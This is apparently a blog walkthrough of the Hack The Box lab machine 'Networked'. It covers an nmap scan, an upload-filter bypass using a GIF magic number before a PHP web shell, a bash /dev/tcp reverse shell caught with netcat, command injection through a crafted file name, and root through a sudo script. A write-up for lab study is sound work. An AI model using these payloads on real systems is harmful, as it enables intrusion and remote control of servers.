🔐
EAkl Blog
  • 👋Welcome!
  • 🐛Web Application Findings
    • Cisco BroadWorks Vulnerabilities CVE-2021–34785 & CVE-2021–34786
    • Authentication bypass using empty parameters.
    • IDOR at Login function leads to leak user’s PII data
  • ℹ️Recon automation, tips and tricks
    • Simple Recon Methodology
    • How to write a simple script to automate finding bugs
  • 🔐Hack The Box Machines
    • Feline Walkthrough
    • Reel2 Walkthrough
    • Active Walkthrough
    • PopCorn Walkthrough
    • Jewel Walkthrough
    • Passage Walkthrough
    • Time Walkthrough
    • Devel Walkthrough
    • Lame Walkthrough
    • Beep Walkthrough
    • Blue Walkthrough
    • Jerry Walkthrough
    • Optimum Walkthrough
    • Grandpa Walkthrough
    • Legacy Walkthrough
    • Mirai Walkthrough
    • Valentine Walkthrough
    • Shocker Walkthrough
    • Netmon Walkthrough
    • Bank Walkthrough
    • Granny Walkthrough
    • Tabby Walkthrough
    • Access Walkthrough
    • Swagshop Walkthrough
    • OpenAdmin Walkthrough
    • Remote Walkthrough
    • Sauna Walkthrough
    • FriendZone Walkthrough
    • Hack The Box — Networked
    • Hack The Box — Forest
    • Hack The Box — WriteUP
    • Hack The Box — Academy
    • Hack The Box — Luanne
  • 🏴‍☠️CTF Challenges
    • CTF CyberTalents  — Bypass the world Writeup
    • CTF CyberTalents — Admin Gate First
    • CTF CyberTalents — Inbox
    • CTFlearn — Inj3ction Time
    • CTF ringzer0ctf — Challenge Access List
    • CTF ringzer0ctf — Login portal 2
    • CTF ringzer0ctf — SQLi challenges — part 1
    • CTF ringZer0ctf — Login form
  • 🔴Red Teaming Tips & Tricks
    • MOTW Defensive and Bypass techniques
  • ☁️Cloud Security
    • [Azure] Real Example to know different types of app concepts in Azure
    • [Azure] What To Do If?
Powered by GitBook
On this page
  1. Hack The Box Machines

Hack The Box — Networked

PreviousFriendZone WalkthroughNextHack The Box — Forest

Last updated 2 years ago

Hack The Box — Networked walkthrough

Hack The Box — Networked

Hey folks, today we have a machine for all who love CTF techniques with PHP techniques, let’s take a look at its info and get started…

Nmap scan

As usual, we will start our scan with nmap scan namp -A -T4 -oG networked.gnmap 10.10.10.146

From the results we have 2 open ports http/ssh and 1 closed report https

After enumerating the website I don’t have found any interesting thing, so I check the source code and also nothing found

After that I’ve checked the directories by brute-forcing them by using dirsearch

We have a bunch of interesting directories like backup/uploads/upload.php so I’ve checked the /backup and found tar file, after downloading and extract it, I’ve found 4 files

After checking upload.php

I understand how it handles the upload process, it checks the file size and the file extension

I then changed the extension to shell.php.png and as you can see it refuses

So it refused my file with file size less than 60000 and also extension contain png

So I tried to add a magic number at the beginning of the shell as you can see GIF8;<?php system($_GET[‘cmd’]); > and it works

From the brute force step I’ve directory called /photos.php so I visited it and see that the file name was changed

And then try to execute command through cmd variable. This will execute whoami with the server because the file extension is.php.png so the server will execute .php first

The next step is invoking reverse shell through this variable by typing bash -i >& /dev/tcp/ip/port 0>&1 and then let nc listen to the same port

User flag

We have a shell now, let’s try to find a way to get user privileges

If you checked the user directory home/guly/and found check_attack.phpfile

it contains exec function which execute commands in the server.

It executes rm -f file_path to /dev/null for any weird file name and the file_path is /var/www/html/uploads so if we could make a file name there with reverse shell bash and make it with weird file name

the file name contain ; . and then open netcat to listen for this port

and the user.txt is available now

Root flag

By executing sudo -l to know what is the user’s privileges I’ve found that he can perform command with sudo with no password

After checking the file content

The first section will open new file with EoF and end it with the second EoF and insert inside it the 3 lines between them

The second and third section will ask you to insert the value of 4 variables and insert your answers into new file

After executing it and insert sh into any variable of them, the server will execute it as bash command and get back the user shell

So let’s try to access and try to upload shell.php “I know that it will refuse, but it was just testing”

I viewed it by accessing

🔐
http://10.10.10.146/upload.php
http://10.10.10.146/photos.php/filename